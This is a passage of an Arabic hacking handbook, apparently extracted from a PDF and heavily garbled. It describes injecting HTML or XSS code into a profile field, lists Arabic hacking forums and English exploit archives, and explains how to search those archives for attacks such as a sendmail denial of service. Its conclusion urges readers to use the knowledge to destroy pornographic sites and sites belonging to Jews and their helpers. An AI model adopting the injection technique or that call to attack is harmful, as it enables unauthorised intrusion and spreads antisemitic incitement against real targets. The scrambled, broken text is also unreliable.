.‬و كده الكود تم تشغيله !!!!‬ ‫مثال للي ممكن تكتبه مثل ‪:‬‬ ‫"<>‪h1>TESTING</h1><b‬‬ ‫طبعا ده حيطبع الكلمه ‪ TESTING‬مكان صورتك الشخصيه ‪!!...‬‬ ‫انتهى‪،،،‬‬ ‫‪326‬‬ .‫>!‪<!-..‬ضع بعد كده اسم اليوزر و رقم الي دي و بعدين ‪submit‬‬ ‫سوف تجد نفسك في صفحه ‪ Your Account‬الخاصه بك ‪..END CODE --‬‬ ‫و الن عليك تشغيل ملف ال ‪ html‬هذا ‪ ..‬‬ ‫اللي انا كنت عايز اقوله انك ممكن تنفذ ثغرات ‪ xss‬او اي حاجه انت مش عارف تنفذها بسبب اغلق كود‬ ‫الهتمل اياه =( لمزيد من المعلومات راجع الدرس هذا كمثال ليس اكثر ؟؟‬ ‫الحل ‪:‬‬ ‫لسه و ال !!!!‬ ‫و السلم عليكم و رحمه ال و بركاته‪.....‬‬ ‫خلي بالك ان فيه مسافه بعد العلمه‬ ‫">‪b‬‬ ‫خلي بالك منها وال سوف تجد بروكين كود ‪.‬اول خانه عليك كتابه الكود المطلووب تنفيذه مع مراعاه انه يجب‬ ‫ن يبدأ بالعلمه ‪:‬‬ ‫"<‬ ‫و ممكن ينتهي بالعلمه‬ ‫>‪b‬‬ ‫حتى ل تجد اي مشاكل في الكود عند العرض ‪.‬‬ ‫اقصى حد للكود اللي ممكن انك تشغله هو ‪ 30‬كراكتر ‪....

‫منتدى إعصار‬ /http://www.net/vb .7 .net/vb .lycos." ‫" أفضل المنتديات العربية للهاكر‬ :::‫أقد لكم أفضل المواقع والمنتديات العربية في مجال الهاك بجميع مجالته على حد معرفتي‬ /http://members.com/vb/index.pharaonics.tk .11 .12 .‫موقع المد الحمر‬ http://www.6 .org .php .7azm.‫منتدى عرب فيجوال بيسك‬ http://www.co.1 .ebnmasr.‫منتدى نجم دوس‬ 327 .‫منتدى رواد‬ /http://www.almuhands.10 .uk/hihack/vb .ruwad.php .com/vb .org/forum/index.arab4vb.com/vb/forumdisplay.9 .5 .nafitha.‫منتدى امبراطورية العرب‬ /http://www.4 .3 .‫منتدى هاكر فلسطين‬ /http://www.13 .‫منتدى معتز نت‬ /http://www.com .net/vb .arabse.‫منتدى منظمة هاي هكر‬ /http://www.naajm.php .h4palestine.net/vb .‫منتدى شبكة المهندس‬ /http://www.e3sar.2 .8 .‫منتدى ابن مصر‬ /http://www.net ‫موقع‬ /http://www.emoataz.‫منتدى شبكة الحزم السلمية‬ http://www.

com‬‬ ‫موقع ‪Security Focus‬‬ ‫‪---------------‬‬‫العنوان ‪/http://www.securify.com :‬‬ ‫واحد من اكبر قواعد البيانات التي تحمل كعلومات متعلقة بالمن‬ ‫انا افضل الذهاب الى هذا الموقع مره في اليوم لقراءة قسم '‪ 'New Files Today‬سواءا للبحث عن‬ ‫ثغرات معينه او ل‪.‬‬ ‫" أفضل مواقع المن والهاك النجليزية "‬ ‫هذه بعض المواقع المهمة التي يستخدمها الهكر لمعرفة اخر الثغرات الصادره مع مقالت بسيط لهذه المواقع‬ ‫موقع ‪Packet Storm Security‬‬ ‫‪---------------------‬‬‫العنوان ‪/http://packetstorm.securityfocus.com :‬‬ ‫‪328‬‬ ..‬‬ ‫اوجد الرشيف عن طريق ‪ Ken Williams‬حيث ان هذا الموقع يستهلك مئات اللوف من النقرات كل‬ ‫اسبوع‬ ‫حاليا انتقلت ملكيته الى مالك ‪.‬‬ ‫وشكرااا‪.‫هذه افضل مارأيته وتصفحته عن المواقع العربية التي تدعم علم الهاك‪.)/Kroll-O-Nagra ) http://www.securify..

pl‬‬ ‫‪.‬‬ ‫وهذه بعض المواقع الخرى‪:::‬‬ ‫موقع ‪/http://rootshell.linux.8.za‬‬ ‫‪.org/sploits.4‬‬ ‫تقبلوا تحياتي‪،،،‬‬ ‫انتهى‪،،،‬‬ ‫تم تحميل الكتاب من مكتبة الطارق اللكترونية‬ ‫‪http://www.securityfocus.3‬فستحتاج لكتابت '‬ ‫‪ 'sendmail 8.cn/hack.php‬‬ ‫‪329‬‬ .com‬‬ ‫‪.com.(Aleph1 (aleph1@underground.3‬‬ ‫موقع ‪http://www.t0010.1‬‬ ‫موقع ‪/http://www.blackcode.tk‬‬ ‫‪.com‬وسابقا‬ ‫كان مستضيفة )‪.2‬‬ ‫موقع ‪http://blacksun.1‬‬ ‫موقع ‪http://www.com‬‬ ‫‪.co.webattack.securityfocus.3‬‬ ‫موقع ‪http://www.com.haker.redi.4‬‬ ‫=‪=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+‬‬ ‫أما بالنسبة لمواقع الهاك النجليزية فمعرفتي بها ضئيلة لعدم توسعي في اللغة النجليزية‪ ،‬وهذه المواقع‬ ‫كالتالي‪:::‬‬ ‫موقع ‪http://www.‬تتحدث يوميا فهؤلء الشباب القائمون على هذا الموقع ل ينامون ابدا !‬ ‫‪BugTraq‬‬ ‫‪-------‬‬‫العنوان ‪ :‬مستضيفه موقع ‪ ).8.com/books/index.‫قاعدة بيانات اخرى كاملة ‪ .ussrback.2‬‬ ‫موقع ‪http://www.com‬‬ ‫‪.netspace.org‬‬ ‫‪ BugTraq‬واحدة من افضل قائمة المراسلت البريدية ‪ mailing list‬التي تتهتم بالمن اللكتروني‬ ‫هذه القائمة يقوم عليها رئيس اسمه ‪ .com‬‬ ‫تستطيع ايضا البحث في ارشيفاتها التي تعتبر لدي من افضل قواعد البيانات وذلك عن طريق دخول الموقع ثم‬ ‫البحث عن رابط '‪'search‬‬ ‫البحث ‪Searching‬‬ ‫‪-----------‬‬‫اذا كنت تريد البحث عن ثغرة متعلقة بخدمه معينة مثل ‪ Sendmail 8.insecure.sk‬‬ ‫‪.org‬يستقبل الرسائل‬ ‫التي ترسلها ) عن ثغرة معينه مثل ( ويقوم بتحليلها وتنضيفها من ال ‪ spams‬والرسائل التي ليس لها‬ ‫فائدة او الثغرات القديمة ثم يقوم بإرسال الرساله الممتازه فقط الى جميع المشتركين في القائمة‬ ‫انصحك بالتسجيل ‪/http://www. /Security Focus )http://www.box.(/Netspace ) http://www.3‬واذا اردت البحث عن ثغره معينه مثل هجوم حجب الخدمه ‪ local DoS‬ضد اي‬ ‫نسخه من ‪sendmail‬‬ ‫فما عليك ال كتابت التالي ‪ 'local DoS sendmail' :‬بدون علمات القتباس‪.html‬‬ ‫‪.

‫الرجاء عدم التجربة على المواقع العربية النافعه والستفاده‬ ‫من المعلومات للقضاء على المواقع الباحية والتابعة لليهود‬ ‫واعوانهم‬ ‫الخاتمة‬ ‫‪330‬‬ .

Sign up to vote on this title
UsefulNot useful